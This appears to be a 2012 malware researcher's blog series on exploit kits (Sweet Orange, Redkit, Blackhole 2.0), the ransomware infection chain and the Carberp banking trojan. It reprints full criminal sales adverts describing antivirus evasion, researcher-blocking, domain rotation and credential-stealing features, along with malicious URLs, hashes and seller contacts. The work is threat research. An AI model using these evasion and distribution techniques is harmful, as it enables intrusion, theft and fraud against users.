CVE-2012-4681 - Связка Sweet Orange

August 29, 2012, 5:03 pm

≫ Next: CVE-2012-4681 - Redkit Exploit Kit - I want Porche Turbo

≪ Previous: Inside view of Lyposit aka (for its friends) Lucky LOCKER

$

0

0

Связка Sweet Orange

Yes, it's becoming boring.
We'll make it fast.
Using [FR] Malekal's sniper technics (hat tip)  you can find a Sweet Orange EK when you need one :


breitlingline[.]biz/ <-- Do not try to go there if you are not a security Expert !!!
petrol.thehickorymotormile.com [:] 8382/AZAgQw?wITGN=78
petrol.thehickorymotormile.com [:] 8382/6 -> c013d9497d787bcc6d7829cd1143bd8b <- incl. CVE-2012-4681
diesel.thehickorymotormile.com [:] 8382/oshPbY?expid=4&fid=7

CVE-2012-4681 piece of code found dropped by Sweet Orange

And it's working as desired by creator.

Fiddler session here : http://minus.com/lZ9tJWFeIZRfw

After Orange...want to see some Red.

---

CVE-2012-4681 - Redkit Exploit Kit - I want Porche Turbo

August 29, 2012, 8:38 pm

≫ Next: Blackhole Exploit Kits update to v2.0

≪ Previous: CVE-2012-4681 - Связка Sweet Orange

$

0

0

Not making the headlines but yet effective (doesn't need a 0 day to reach 20% break) Redkit Exploit Kit has also (again...no news here) integrated the last Vulnerability from java.

polremo.pl/censored.html

Funny message on successful trigger of Redkit Landing page

[[ Remind me one of the first domain for Gimemo Ransomware landings : "nextcarferrari.com"

Domain used in Gimemo Ransom campaign

]]

polremo.pl/88censored.jar --> 5b0bc70c76c7c48fc34105591e5837fe

polremo.pl/33censored.jar (HTTP 404)

CVE-2012-4681 piece of code found in a jar dropped by Redkit Exploit kit

In fact, was expecting more obfuscation in the code from this finely tuned EK
Note, as for Sakura, the final payload did not reach the targeted computer (but can't tell why).

Post of this blog about Redkit :
Inside RedKit Exploit Kit - Exploit Kit Customer Control Panel 2012-05-05
#Redkit not so red anymore - Adaptation in action 2012-05-08
Redkit - one account = one color 2012-06-22

Blackhole Exploit Kits update to v2.0

September 11, 2012, 11:24 pm

≫ Next: The path to infection - Eye glance at the first line of "Russian Underground" - focused on Ransomware

≪ Previous: CVE-2012-4681 - Redkit Exploit Kit - I want Porche Turbo

$

0

0

Paunch notification on Exploit.in about v2.0

Original text of the Advert ( Pastebin )  (for rough translation see at bottom - Illustration of an infection + related files in this post.)

BlackHole exploit Kit 2.0

Рады приветствовать вам совершенно новую версию связки эксплойтов. За более чем 2 года существования нашего проекта, старый движок связки изрядно заездили и затаскали, АВ компании стали очень быстро распознавать по неким критериям что это BlackHole и помечать ее как malware. В новой версии мы переписали все с нуля, причем с нуля переписана не только часть с выдачей эксплойтов, но и админ панель.


Из новшеств по выдаче:
1. Мы максимально защитили эксплойты от автоскачивания их АВ компаниями, теперь генерируется динамический УРЛ, который действителен в течении нескольких секунд, нужных лишь для одного заражения потенциально заходящего на ссылку человека.
2. Теперь так же максимально защищен и ваш ехе, АВ компания не сможет его просто так скачать, что позволит держать ваши ехе максимально долго в чистоте.
3. JAR и PDF файлы выдаются только тем версиям плагинов, которые уязвимы, если плагин не уязвим, сплойт не выдается, и не пачкается лишний раз.
4. Нам удалось отказаться от plugindetect для определения версии явы, что позволило убрать из связки много лишнего кода ускорив тем самым загрузку связки, а так же файл getJavaInfo, который запускал ява машину у всех заходящих, вне зависимости от того уязвим этот человек или нет.
5. Были убраны все старые эксплойты, дающие мизерный пробив но пугающие визуальными оповещениями и крешами браузера, такие как Flash, HCP, PDF All... Теперь в связке в админке числятся 3 эксплойта: Java Pack (atomic + byte), PDF LibTiff, MDAC (его оставили потому как он не крешит браузер, не палится аверами так как нам удалось его вычистить, и на старом ИЕ6 до сих пор работает как надо)
6. В версии 1.* ссылка на трафик к сожалению была распознаваемой для АВ компаний и для реверсеров, вид у нее был такого вида, ./main.php?varname=lgjlrewgjlrwbnvl2. В новой версии ссылку на трафик вы можете составлять сами, вот пару примеров: /news/index.php, /contacts.php и так далее, теперь за этот момент ни 1 АВ не сможет зацепиться. Причем по умолчанию имена потоков при создании потока создаются автоматически из словарика с реальными словами а не рандомными буквами.
7. Выдача теперь отдается ТОЛЬКО уникальным пользователям, что показывать при повторном заходе решать только вам, это может быть как HTML заглушка отредактированная лично вами, так и редирект на допустим ваш лендинг или любой другой сайт.
8. Теперь все урлы динамические, без постоянных имен переменных за которые можно было бы зацепиться, файла для скачивания ехе теперь просто напросто нет, или урла на JAR, теперь все пути идут непосредственно на файл на который ты пришел.
Разработано и внедрено еще очень много фишек которыми хвастаться и орать в паблике просто не резонно, дабы конкуренция и АВ компании не дремлят.


Из новшеств в админ панели:
1. Ввели captcha при авторизации, на нашей практике было достаточно не мало случаев взлома админ панелей клиентов путем брута, это должно не много притормозить неких умников.
2. Статистику по потоку теперь легко можно посмотреть выбрав его из выпадающего меню на главной странице статистики, так же станет доступна для быстрого просмотра и копирования ссылка на гостевую статистику.
3. Теперь админка не будет тормозить при достижении 1-2кк трафа, да и вообще не будет тормозить, вся нагрузка распределена на скрипты исполняющиеся по крону и группировку кучи логов в 1 запись, это позволит вообще не обнулять статистику и копить ее чуть ли не годами. По сути 2.0 версию мы писали для того, что бы объемы связка могла держать в разы больше чем старая версия, чего мы успешно добились.
4. Добавлена возможность использовать в качестве вспомогательного инструмента для производительности Memcached, причем очень удобно, его можно и не использовать для тех у кого объемы трафика не валят сервер.
5. К списку операционок добавлены Win 8 и мобильные устройства, для того что бы увидеть сколько в вашем трафике мобильного, причем мобильный трафик вы сможете редиректить на соответствующие партнерки.
6. В патоках мы так же увидим новшества, ранее было возможно оперировать двумя типами правил, эксплойты и редиректы, сейчас добавился пункт Заглушка. Заглушка служит для отображения статичной html странички. К примеру, вы можете сделать заглушку для гугл хром трафика, и там создать страничку с текстом такого рода: Эта страница работает только в Internet Explorer, Opera, Firefox.
7. Теперь появилась долгожданная фишка, отключения потока при Палеве ехе файла. Система сама проверяет палево вашего файла через указанное вами время при добавлении файла.
8. Появилась возможность использовать связку как прокладку, между источником трафа и местом ее назначения, для чего при создании потока появилась возможность указывать урл для редиректа отработанных связкой трафа. Полезно для пропускания трафа через несколько связок, либо для последующего редиректа на лэндинги.
9. При добавлении к файлу появилась возможно указывать периодичность проверки этого файла на палево АВ, а так же периодичность обновления файла с урла (если этот файл добавляется по урлу).
10. Появилось новое меню "Версии софта", там мы сможем наблюдать версии плагинов Java, Acrobat reader вашего трафика, видеть пробив каждой из версий, мониторить качество трафика путем просмотра, предоставляет ли трафер пробиваемые плагины в своем трафике. Очень полезно для оценки качества трафика и для мониторинга корректной работы сплойтах на нужных версиях плагинов.
11. Полностью обновили раздел "Безопасность", о нем можно посветить даже целый подраздел:
а) появилась возможность блокировать трафик без рефереров (рекомендуем всегда держать включенным)
б) появилась возможность банить не нужные рефереры
в) появилась возможность банить все рефереры кроме указанных вами
г) появилась возможность банить ботов по заранее подготовленной базе из 13к ипов (спасибо xshaman) (рекомендуем всегда держать включенным)
д) появилась возможность банить TOR сети, ипы которых обновляются динамически, как показала практика большинство реверсеров работают от туда (рекомендуем всегда держать включенным)
е) появился режим записи, допустим вы остановили трафик и ждать трафика вам не от куда, ставите режим записи, и все реверсеры и боты которые идут на вашу ссылку после остановки трафа прямиком идут в бан лист)
12. Так как в разделе 11 у нас появилось много возможностей для банов, то при выборе хотя бы 1 варианта бана, в меню появляется "Бан статистика", в которой можно видеть количество заблокированного трафика, и причину блокировки
13. В разделе настроек теперь мы можем указывать более детально, что мы хотим делать с статистикой рефереров (Не вести учет рефереров, Вести учет рефереров, Вести учет рефереров без отображения в гостевой стате)
14. Появилась возможность обновлять базу GeoIP одним кликом в админке
15. Всеми ожидаемая возможность возможность выключать связку при палевном домене, выглядит это примерно так: вы выбираете при каком количестве АВ домен считать не чистым (например 1), как только домен попадает в блек по 1 ав, он переключается на следующий. Так же есть возможность указывать что делать в случае если чистые домены закончатся, отключать связку полностью, либо использовать не чистый домен.
16. В связи с настройкой описанной в пункте 15 появилось новое меню "Домены", где мы можем добавлять списки доменов, видеть их палевность, управлять ими полностью, а так же возможность получить API ссылку для определенного потока, по которой можно будет видеть всегда чистую ссылку на трафик.
На самом деле версия 2.0 это не продолжение старой связки, это совершенно новая система написанная полностью с нуля учитывая просьбы клиентов собираемые на протяжении более 2 лет эксплуатации версии 1.*



Так же рады сообщить, что цены остались такими же:

Аренда на нашем сервере:
-сутки аренды - 50$ (лимит по трафику 50к хитов)
-неделя аренды - 200$ (лимит по трафику 70к хитов в сутки)
-месяц аренды - 500$ (лимит по трафику 70к хитов в сутки)
при нужде лимит трафика можно повысить за доп. плату

Лицензия на вашем сервере:
-Лицензия на 3 месяца 700$
-Лицензия на пол года 1000$
-Лицензия на год 1500$
мультидоменная версия связки - 200$ разово на весь срок лицензии (привязка не на домен а на айпи)
смена домена на стандартной версии связки - 20$
смена ip на мультидоменной версии связки - 50$
разовая чистка - 50$
авточистки на месяц - 300$ (чистки заливаются сами вам на сервер, сразу как спалится ваш криптор)


-------------------
В связи с тем что в топике версии 1.* накопилось очень много отзывов и сообщений, под версию 2.0 выделен отдельный топик, а старый топ будет закрыт как архивный, вот ссылка на него:http://exploit.in/forum/index.php?showtopic=41662


Наши контакты:

Автор и саппорт в 1 лице (время работы ненормированное):
JID: paunch@jabber.no
JID: paunch@thesecure.biz
JID: paunch@neko.im
ICQ: 343002

Саппорт (время работы с 9 до 19 по будням):
JID: blackhole2@jabber.ru
ICQ: 530082

--Google Translate-- (Pastebin )


BlackHole exploit Kit 2.0 

Are pleased to welcome you to a brand new version of the bundle of exploits. For more than 2 years of existence of our project, the old engine arrival and ligaments badly worn, AV companies have become very quick to recognize that this kind of criteria BlackHole and flag it as malware. In the new version we have rewritten from scratch, and re-written from scratch is not only part of the issuance of exploits, but also the admin panel.


Of the innovations on the issue (Translation improved by Denis Laskov ):
1.  Implemented maximum protection from Automatic systems for downloading exploits, used by AV companies: generate a dynamic URL, which is valid for a few seconds, you need only to one victim at a time.
2. Now, Your executable also protected from multiple downloads, AV company can not just download it, which will keep your exe as long as clean.
3. JAR and PDF exploits show only for   detected vulnerable versions of plug-ins  if the plug is not vulnerable,exploits not issued, and not get in detection loop.
4. We not using anymore plugindetect to determine the version of Java that will remove a lot of the bunch of extra code thus accelerating the download bundles, as well as file getJavaInfo, who ran the Java no matter of plugin version vulnerable or nor
5. Have been removed all the old exploits, giving tiny result but causing scare visual effects and browser crash, such as Flash, HCP, PDF-All ... Now the link in the admin area of ​​the number 3 Exploit: Java Pack (atomic + byte), PDF LibTiff, MDAC (he left because he did not crash the browser, still have  low-detection ratio, because we managed to clean up, and the old IE6 is still common in field)
6. In version 1. * link to malicious payload unfortunately was recognizable for AV companies and reversers, she looked this kind,. /Main.php?Varname=lgjlrewgjlrwbnvl2. The new version of the link to the malicious payload you can choose yourself, here are some examples: /news/index.php,/contacts.php and so on, now for the moment no one AV can not catch. And by default stream names when creating the flow created automatically from the dictionary with the actual words and not a random letters.
7. Issuing now given only unique users, when re-entering - its up to you to decide, what to do: it can be your HTML stub code, or redirect to your landing or any other site.
8. Now all URLs are dynamic, without permanent names for variables that could be detectable by mask, no file for exe download at all,  same to the JAR, now all that required is original path, which victim was pointed to.
Developed and implemented a lot more private tricks that author prefer not to disclose in public simply not reasonable, because competitors and the AV companies always sneak around.


Of the innovations in the admin panel:
1. Captcha entered for logging on to our practice, it was not enough to break a few cases the admin panel of clients by Brutus, it should not slow down a lot of some wise men.
2. Statistics on the flow now easy to see by selecting it from the drop down menu on the home page of statistics, will also become available for quick viewing and copying the reference to guest statistics.
3. Now the admin panel will not slow down when it reaches 1-2kn cores, and generally will not slow down, the entire load is distributed on the scripts are executed on the crown and the grouping of piles of logs in one account, it will never reset statistics and stash it almost years. Essentially version 2.0 we wrote for what amounts to a bunch of could hold many times more than the old version, which we successfully achieved.
4. Added the ability to be used as an aid to performance Memcached, and very convenient, and it can not be used for those who do not bring down the volume of traffic the server.
5. To the list of operating systems added to Win 8, and mobile devices, in order to see how much of your traffic is mobile, and mobile traffic, you can redirect to the appropriate affiliate.
6. In the molasses, we also see the innovations might have been allowed to operate with two types of rules, exploits and redirects now Add item stub. Plug is used to display a static html page. For example, you can make a plug for Google Chrome traffic, and there to create a page with the text of its kind: This page only works in Internet Explorer, Opera, Firefox.
7. Now it is a welcome feature, disable flow with fawn exe file. The system automatically checks the pale of your file through the time you specify when you add a file.
8. Now you can use a bunch as a gasket between the power cores and the place of her destination, for which to create an opportunity to select the stream URL to redirect to waste a bunch of cores. It is useful to pass a few cores ligaments, or for subsequent redirect to Landing.
9. When added to the file will be possible to specify the frequency of inspection of the file on the pale AB, as well as an update file with slashes (if the file is added to urlu).
10. There is a new menu item "Software Version", where we can watch the version of plugins Java, Acrobat reader of your traffic, see the breaking of each version, monitor the quality of traffic by looking at is whether trafer pierces the plug-ins in your traffic. It is very useful for evaluating the quality of traffic and to monitor the performance sployty on the right version of the plugin.
11. Completely updated "Security", about it can devote even a sub-section:
a) the opportunity to block traffic without referer (we recommend to always keep on)
b) the opportunity to ban unnecessary referrers
c) the opportunity to ban all referrers except those you
d) the opportunity to ban bots on a prepared base of 13k ipov (thanks xshaman) (recommend that you keep it turned on)
d) the opportunity to ban TOR network, Types which are dynamically updated as the practice most reversers work from there (it is recommended to always keep on)
e) there was a recording mode, let you stop the traffic and you do not have to wait for the traffic of which, put the record mode, and all reversers and bots that run on your link after stopping cores directly go to the ban list)
12. As in Section 11, we had many opportunities to bans, selecting at least one version of the ban, the menu, the "Ban Statistics", in which you can see the number of blocked traffic, and the reason for the lock
13. In the settings section, we can now specify in more detail what we want to do with the referrer statistics (not to record the referrer, and keep track referrers Keep track referrers without displaying the guest of the article)
14. An opportunity to update GeoIP database with one click in the admin
15. All of which had expected to able to disable a bunch of incriminating in the domain, it looks like this: when you choose how much AB domain considered not clean (eg 1) as soon as the domain gets in the black for one auto, it switches to the next. It is also possible to specify what to do if a net domains run out, turn off a bunch of completely, or use no net domain.
16. In connection with the adjustment described in paragraph 15, a new menu "Domains", where we can add lists of domains incriminating see them, manage them completely, as well as the opportunity to get API reference for a particular stream, on which you can always see a link to a clean traffic.
In fact, version 2.0 is not a continuation of the old bunch, is a completely new system written entirely from scratch, given the client is going to request for more than two years of operation, version 1. *



So glad to report that prices have remained the same:

Rent on our server:
-Day rental - $ 50 (limit traffic 50k hits)
-Week rent - $ 200 (limit traffic 70k hits a day)
-Month lease - $ 500 (limit traffic 70k hits a day)
if need traffic limit can be raised for the add. fee

The license for your server:
-License for 3 months $ 700
-The license for six months $ 1,000
License-year $ 1500
multidomain version bundle - $ 200 one-time fee for the duration of the license (not binding on the domain and the ip)
change of the domain on the standard version bundle - $ 20
change ip for multidomain version cords - $ 50
a one-time cleaning - $ 50
avtochistki a month - $ 300 (cleaning poured yourself on your server, as soon as your slept kriptor)


-------------------
Due to the fact that the topic for version 1. * Accumulated a lot of reviews and reports for version 2.0 allocated a separate topic, and the old top will be closed as a history, here is the link to it: http://exploit.in/forum/index. php? showtopic = 41662


Contacts:

Author and a support to one person (working normalized):
JID: paunch@jabber.no
JID: paunch@thesecure.biz
JID: paunch@neko.im
ICQ: 343002

A support (working hours from 9 to 19 on weekdays):
JID: blackhole2@jabber.ru
ICQ: 530082
-------------------------------------------------------

Blackhole 2.0 Login page with the Captcha

Illustration of an infection + related files in this post.

Edit 12/09/12 - 22:12 Some part of Google Translation improved Denis Laskov
Edit 13/09/12 - 02:14 Links to real case infection data.

The path to infection - Eye glance at the first line of "Russian Underground" - focused on Ransomware

December 5, 2012, 6:58 am

≫ Next: Carberp, the renaissance (?)

≪ Previous: Blackhole Exploit Kits update to v2.0

$

0

0

One year since I started "active" actions in understanding what is on the other side of malware/mass infection campaign. Will share in one picture how i figure things.
 ( I hope to have many feedback to fix/adjust my understanding )

I will focus on the Ransomware case but most parts are valid for many other "blind mass attack" (as Ransomware is a specific case of Botnet )

Straight to the visual :

Eye glance at the first line of "Russian Underground" The path to infection (too small ? http://i2.minus.com/iiZFU63Eeuw8W.jpg) Credits for some models used here

And now here are basic explanation to read the illustration (even if most of you don't need it :P ).
I won't talk about what happen after infection (data/voucher code reselling, money laundering, etc...). It's another story.

 (will try to add here a table of content or list of anchor links)

-Poke A Mole Concept

I will first talk about a concept to which i will often refer, the forest hiding the tree, or the "Poke A Mole board".
On previous map, most of the steps are represented by a single node but even small groups will hide the real node/bad server behind redirectors/reverse proxies. It's easier to recreate a redirector than rebuild a new server once a node is burnt (read: blacklisted by browser internal protections or antivirus or other filtering tools).
The smallest group will have one server and multiple IP, then we'll see some groups with one server and one redirector with multiple IPs, and bigger groups can daily add many redirectors.

This is how you can reach this kind of architecture for a single exploit kit :

Cool EK Poke A Mole Board (Snapshot as I saw it on 13/10/2012) Too small ? : http://i.minus.com/ibbdTxd1LpqqHr.jpg

or even bigger ( I saw one Blackhole with up to 2400 ips available to reach it...at least 1940 when it was also hosting a Ransomware C&C)

Same goes for Domains. Having hundreds of domain allow bad guy to switch from one to another and escape domain based blacklisting. Managing domain generation/rotation can be manual, "outsourced", built-in the tools or managed by dedicated tools. I'll give more details later.

One other great illustration for both, was back in february/march 2012, the Sinowal/Torpig group hosting its custom Blackhole on infected nodes of its botnet and making it reachable via Fast-Flux && DGA (based on Twitter trends).

-Infection vector :

this is how you get infected (as I focus on Ransomware, I won't talk about USB/Network Share etc..

 - Browsing Website :

   - Compromised website : one website has been compromised either using a vulnerability (usually on outdated CMS) or using stolen credentials from owner, modified to redirect visitors to the infection.
There are a lot dedicated tools to manage a huge amount of iFrame on website with known credentials or kown vulns

  - Malvertising : same via a malicious fake advert (see advertising platforms)

  - Chat/mail

    - link to compromised website or exploit kit
    - binary as attachement, or document with link to the exploit kit

( Matsnu/Rannoh mainly spread by mail, and skype was used to redirect users to BH EK 2.0 then Ransomware )





The tools :

A Nacha/Facebook themed spam Tool

One more mailer

To figure out more about that you can read:

Threat Outbreak Alerts (Cisco)

Dynamoo's Blog

   - Manual download

    - the victims download the binary by themselves thinking it's something else (a "free" version of a paid game, an indispensable video plugin, a disinfection tool, etc...)

   - Push in botnet

Not a "real" one as it's in fact an already infected computer which is being pushed another malware. ( See for instance Reveton pushed in a Smokebot. I saw also Lyposit, Vicas, Urausy pushed that way ) .

Tools : Task option of most Botnet C&C panel

In Upas:

In Zemra :

In Andromeda :

etc...

Advertising Platforms

The platform can be legit or not. Clicksor, Plugrush, Adfly are often being victims of these kind of badvertisers. Some platform are built for that dark job. Malekal pointed a fake platform  in this brilliant post about MegoADS

These platforms are used or abused by bad guys to push advertisement that will drive the user to the redirection infrastructure, often for instance fake porn website (see later).

Malvert redirecting to "Sibhost" EK which is pushing Urausy

Cbeplay.P pushed by Sweet Orange via TrafficBroker Malvert

BH EK 2.0 landing after tilt on malvert

Tools:

Account on legit platform TrafficHolder

If you want to learn more about malvertising you should follow Malekal's Job.
Some readings :
Finnish Website Attack via Rogue Ad - 2012-12-05 - Sean - F-Secure
Ads Integrity Alliance: Working together to fight bad ads - 2012-06-14 - Google Official Blog

Redirection infrastructure :

This block cover all the steps between the first redirection to the exploitation. This is the "Traffer Zone".
Depending on how many actors are involved/how mature are the groups you can see a huge amount of hops.


The first step after malvertising is TDS or fake website with redirect js

Tools:

When modifying a saved legit page is not enough to build a fake site, there are dedicated tools to do this.

Initial advert for FakeMaker

Fakemaker (one fake website builder)

(more here :  http://kafeine.minus.com/lsInqkPcgjHSY )

In some case the fake website is used to "prepare" the victim. For instance to increase conversion rate (people paying among infected people) on ransomware some traffer do not hesitate to redirect you to a fake Child porn website (but with real images). Victim shocked before being presented a pseudo law enforcement warning.

Dedicated TDS. Those TDS can be hidden behind forest of redirectors/reverse proxies.
They are redirecting traffic based on country/browser depending on the needs (client requests).
One TDS will often serve different exploit kits depending on the countries/sources of people hitting it.

Sutra,

1 TDS many Exploit Kits (at least 5 ) For instance a French landing here will be redirected to the default page.

Sutra driving IT Chrome user to a server faking Chrome Update (the server is in fact also a Blackhole Exploit Kit and Pony C&C redirector )

Keitaro :

Keitaro - Traffic page

SimpleTDS

sTDS 2.0 MOD JackSoft (a simple TDS modification) :

Other tool : Traffic Shop Analyzer the father of Ninja-TDS

Traffic Shop Analyzer v3.2 lite

Illustrating 2 paths :

2 path : a straight simple path (red) vs a more advanced one with multiple node and "poke a mole boards" (i'll add real life illustration at the end)

The RunForestRun campaign that was including DGA was a traffer side work.
The js were redirecting to a TDS who could then redirect to other TDS or to Exploit Kits (We saw at least Blackhole and Redkit).

Want to read more about TDS and Traffic exchange platform ?
Using Traffic Direction Systems to simplify fraud...  and complicate investigations! - Maxim Goncharov - Trendmicro for VB2011

Traffic Exchange Platforms

Won't spend a lot of time here. These are places where traffer/EK operators can register and can sell/buy traffic. There are tools to build this kind of platform

Small Traffic Exchange Platform (based on Web-Traffic Shop) stats

Domain rotator sytem

Tools/utility that cover the need for fast/mass domain rotation.

Most exploit kits have built-in features for this.

This was one of the addition to the version 2.0 of Blackhole Exploit Kit.

This is one of the big feature of Redkit (domain every hours, path every few seconds) , it has also been added to ProPack. The group behind the Cool EK pushing Reveton has also a backend system (I saw at least ten IPs ) with an api to serve active hijacked domains to traffers

Tools :

 Qpi Rotator

Qpi Rotator

Qpi Rotator Settings allowing domain auto-rotation based blacklisted level

Exploit Kits

Won't spend a lot of time here too as most post in this blog are focused on this part.

The basics

If you want to see more take a look at these references :
Common Exploit Kits 2012 Poster - 2012-11-11 Mila - Contagio
Wild Wild West - 2012-23-10 - Kahu Security
An Overview of Exploit Packs (Update 17) October 12, 2012 - 2012-10-12 Mila - Contagio

A binary life

This to illustrate the Crypt and AV Check Services

.
Note that most tools on the path are able to check how clean is a binary, exploit pack or domain.

Cool EK check both binary and "sploit pack".

Redkit (old capture)

Blackhole  allow binary check through 2 services

Check feature included in Citadel Botnet

In Upas kit :

Underground Forums

This is a key point where all independent actors exchanges service offers and establish contacts. Reading this blog you'll see many screenshots of announcement or services offer. Forum are also often the place where conflict are solved in section often named "Black"/"Blacklist".

If you want an idea on the diversity of services take a look at this advert collection :
http://kafeine.minus.com/mnrcD1JxAzu2U (focused on : Traffing, Hosting, Crypting, Virtual Currency Echange, Ransomware affiliates etc...). These advert are found inside services (Forums, Scan, Crypt, Blackhole..etc)

So behind an infection there is a dark economy in turmoil with a lot of specialized individuals/groups.
We can spend a lot of time discussing about each hat/job in the path. From the domain registration to the hosting, from the coding to the spreading but it was just an eye glance :)

Feel free to comment / send remarks kafeine at dontneedcoffee dot com.

Carberp, the renaissance (?)

December 12, 2012, 2:30 am

≫ Next: Inside Impact Exploit Kit - back on track (?)

≪ Previous: The path to infection - Eye glance at the first line of "Russian Underground" - focused on Ransomware

$

0

0

"not for you" image used by Carberp

Carberp never really stopped but seems like it was not spread massively/updated anymore since huge operation against gang using it in Russia back in February/March 2012.

But it seems we will have to deal with this banker again.

2 days ago :

Carberp Advert (2012-12-10)

Original text of the Advert :
------------------------------------------
Банкбот Carberp
Мы решили возобновить продажи после долгого перерыва в связи с выходом новой версии бота с буткитом.
По сравнению с предыдущей версией улучшились стабильность, живучесть и функциональность.
Так же хочу отметить появление возможности аренды софта.
Все наши текущие клиенты, по каким-либо причинам потерявшие с нами связь, могут получить обновление своей сборки.
В качестве обновления будет предоставлена одна из вариций минимальной сборки, в зависимости от ранее приобретенной комплектации.
Новым клиентам такие вариации предоставляться не будут, для них существует только одна минимальная сборка.
Мы открыты для разного рода предложений, в т.ч. по написанию АЗ и работе под %.
Предложения с условиями, при которых вы получаете текущий софт бесплатно, рассматриваться не будут.
Все вопросы и предложения просьба отправлять в jabber.
Все что оставляете в текущей теме, отправляете в PM или куда-то еще может остаться без внимания.
При накоплении достаточного количества вопросов я организую FAQ.
Краткое описание:
Каждая последующая сборка включает в себя предыдущие
Минимальная:
- Лоадер
- ФТП граббер (31 клиент)
- Пассворд граббер
- Форм граббер (IE, FF, Opera)
- ФТП сниффер
- Граббер basic-авторизации в IE
- Удаление cookie и sol в IE и FF
- DDOS
- Socks5 прокси
- Поддержка инжектов в IE и FF
- Программа для написания и отладки инжектов с удобным GUI
- Шифрование траффика
- Билдер
- Многофункциональная админка бота
Расширенная:
- Граббер сертов из IE
- Модуль Хантер
- Универсальный кейлоггер
- Автообновление крипта и доменов
- Поиск слов в документах и отправка в админку
- Запись видео на боте для отладки инжей и АЗ
- Расширенный функционал в админке
Полная:
- VNC (win xp/vista/7 admin/user) и RDP (win xp admin)
Буткит:
- MBR-загрузчик бота (win xp/7)
Цены:
Минимальная - $5к или $2к/мес
Расширенная - $10к или $3.5к/мес
Полная - $15к или $5к/мес
Буткит - $40к или $10к/мес
Тест возможен по договоренности
Гарант приветствуется
Принимаем исключительно LR
Связь: batman@xabber.de
PGP-ключ можно взять в полном описании
Ссылка на полное описание: http://www.sendspace.com/file/7119sj (pass - lcTJTCDs)
------------------------------------------
 Translated by google as :
------------------------------------------
Bankbot Carberp
We decided to resume sales after a long break due to the release of a new version of the bot bootkit.
Compared with the previous version improved stability, durability and functionality.
Also I want to note the appearance of the possibility of renting software.
All of our current clients, for whatever reason, have lost touch with us, can upgrade their assembly.
As an update will be given one of varitsy minimal assembly, according to previously purchased a complete set.
New customers such variations will not be provided, for them there is only one minimal assembly.
We are open to all kinds of proposals, including AZ on writing and working under%.
Proposal with the conditions under which you get the current free software will not be considered.
All questions and suggestions please send to jabber.
Leave all that in the current theme, send a PM or anywhere else can be ignored.
With the accumulation of a sufficient number of questions I organize FAQ.
Short description:
Each subsequent assembly includes previous
Minimum:
- Loader
- FTP grabber (31 client)
- Passvord grabber
- Form Grabber (IE, FF, Opera)
- FTP sniffer
- Grabber basic-authentication in IE
- Remove cookie and sol in IE and FF
- DDOS
- Socks5 proxy
- Support injected in IE and FF
- A program for writing and debugging injected with convenient GUI
- Encrypted Traffic
- Builder
- Multi-bot Admin
Extended:
- Grabber Serta from IE
- Module Hunter
- Universal keylogger
- AutoUpdate crypt and Domains
- Search words in documents and send to the admin panel
- Video recording on the boat for debugging inzhey and AZ
- Enhanced functionality in the admin
Full:
- VNC (win xp/vista/7 admin / user) and RDP (win xp admin)
Bootkit:
- MBR-loader bot (win xp / 7)
Price:
Minimum - $ 5k or $ 2k/mes
Extended - $ 10k or $ 3.5k/mes
Complete - $ 15k or $ 5k/mes
Bootkit - $ 40k or $ 10k/mes
The test is available by arrangement
Guarantor welcome
Accept only LR
Communication: batman@xabber.de
PGP-key you can take in the full description
Link to the full description: http://www.sendspace.com/file/7119sj (pass - lcTJTCDs)
------------------------------------------


And here is the full description original text :
------------------------------------------

Carberp

Отстук 60-90%
Win XP/Vista/7 x86

-------------------------------

Комплектации

Каждая последующая включает в себя предыдущие

Минимальная:
- Лоадер
- ФТП граббер (31 клиент)
- Пассворд граббер
- Форм граббер (IE, FF, Opera)
- ФТП сниффер
- Граббер basic-авторизации в IE
- Удаление cookie и sol в IE и FF
- DDOS
- Socks5 прокси
- Поддержка инжектов в IE и FF
- Программа для написания и отладки инжектов с удобным GUI
- Шифрование траффика
- Билдер
- Многофункциональная админка бота

Расширенная:
- Граббер сертов из IE
- Модуль Хантер
- Универсальный кейлоггер
- Автообновление крипта и доменов
- Поиск слов в документах и отправка в админку
- Запись видео на боте для отладки инжей и АЗ
- Расширенный функционал в админке

Полная:
- VNC (win xp/vista/7 admin/user) и RDP (win xp admin)

Буткит:
- MBR-загрузчик бота (win xp/7)

-------------------------------

Список программ граббера

Мессенджеры
Miranda, ICQ2003, RQ,
Trillian, ICQ99b, MSN, Yahoo,
AIM, Gaim, QIP, Odigo, IM2,
SIM, GTalk, PSI, Faim, LiveMessenger,
PalTalk, Excite, Gizmo, Pidgin, AIMPRO,
MySpace, Pandion, QIPOnline, JAJC, Digsby,
Astra

Почтовые клиенты
Becky, The_Bat, Outlook,
Eudora, Gmail, MRA, IncrediMail,
GroupMailFree, VypressAuvis, PocoMail,
ForteAgent, Scribe, POPPeeper,
MailCommander, Windows_Mail_Live, Windows_Mail_Vista

ФТП клиенты
Total Commander, FAR Manager, WS_FTP, CuteFTP,
FlashFXP, FileZilla, FTP Commander, FTP Navigator,
BulletProof, SmartFTP, TurboFTP, FFFTP, CoffeeCup,
Core FTP, FTPExplorer, Frigate3, UltraFXP, FTPRush,
SecureFX, Web Publisher, BitKinex, Classic FTP PC,
Fling, SoftX FTP Client, Directory Opus, FreeFTP,
DirectFTP, LeapFTP, WinSCP

Браузеры
Firefox, Safari, Opera, IE, Chrome

Прочее
SysInfo, WinVNC, ScreenSaver,
ASPNET, RDP, FreeCall, CamFrog,
PCRemoteControl, NetCache, CiscoVPN,
Credentials

-------------------------------

Socks5 прокси

Для приема ботов используется серверное windows-приложение
Когда бот отстукивает, сервер его соединяет и вешает его на отдельный порт
Делает из ботов SOCKS5-прокси
Веб-интерфейс для подсоединения и управления ботами

-------------------------------

Инжекты

Инжектирование работает на IE и FF
Поддерживаются параметры G, P и L
Синтаксис 1в1 как у зевса, но на всякий случай нужно проверять на работоспособность
Есть удобная программа-отладчик инжектов, с помощью которой легко проверить работоспособность своих инжей и написать новые

-------------------------------

Шифрование траффика

Весь траффик от бота до админки и обратно шифруется уникальным для каждого ботнета ключом
Боты не могут стучать на админку с другим ключом
Все запросы от бота в админку идут на скрипты со случайными именами
Все плагины, скачиваемые ботом из админки, так же шифрованы

-------------------------------

Модуль Хантер

При посещении определенного url бот запрашивает из админки определенную команду, так например можно включить рдп всем ботам которые зашли в банк или подгрузить какой-либо ехе

-------------------------------

Универсальный кейлоггер

Через админку определяется список процессов, в которых необходимо логировать нажатия клавиш
Боты получают список и отправляют в админку логи сразу после их появления
В админке логи разделяются не только на процессы и отдельных ботов, но и на разные запуски приложения

-------------------------------

Автообновление крипта и доменов

Обновление ботам крипта на чистый и доменов для отстука без перебилдинга и обновления ботов
